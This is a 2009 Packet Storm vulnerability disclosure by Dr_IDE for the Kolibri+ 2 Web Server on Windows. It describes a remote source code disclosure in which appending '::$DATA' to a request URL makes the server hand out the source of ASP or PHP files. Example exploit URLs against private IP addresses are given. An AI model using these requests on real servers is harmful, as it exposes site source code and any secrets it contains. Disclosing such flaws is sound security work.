Kolibri+ Web Server 2 Disclosure

2009-09-11T00:00:00
ID PACKETSTORM:81216
Type packetstorm
Reporter Dr_IDE
Modified 2009-09-11T00:00:00

Description

                                        
                                            `#################################################################################  
# #  
# Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure #  
# aka: More fun with Kolibri+ 2 webserver #  
# Found By: Dr_IDE #  
# Tested On: Windows XPSP3 #  
# #  
#################################################################################  
  
- Description -  
  
Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of  
the application available.   
  
This vulnerability is similar to the one reported earlier by Skull-HacKeR.  
  
Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure  
(download in this case) by the following means.  
  
- Technical Details -  
  
http://[ webserver IP]/[ file ][::$DATA]  
  
http://172.16.2.101/default.asp::$DATA  
  
http://172.16.2.101/index.php::$DATA  
  
  
`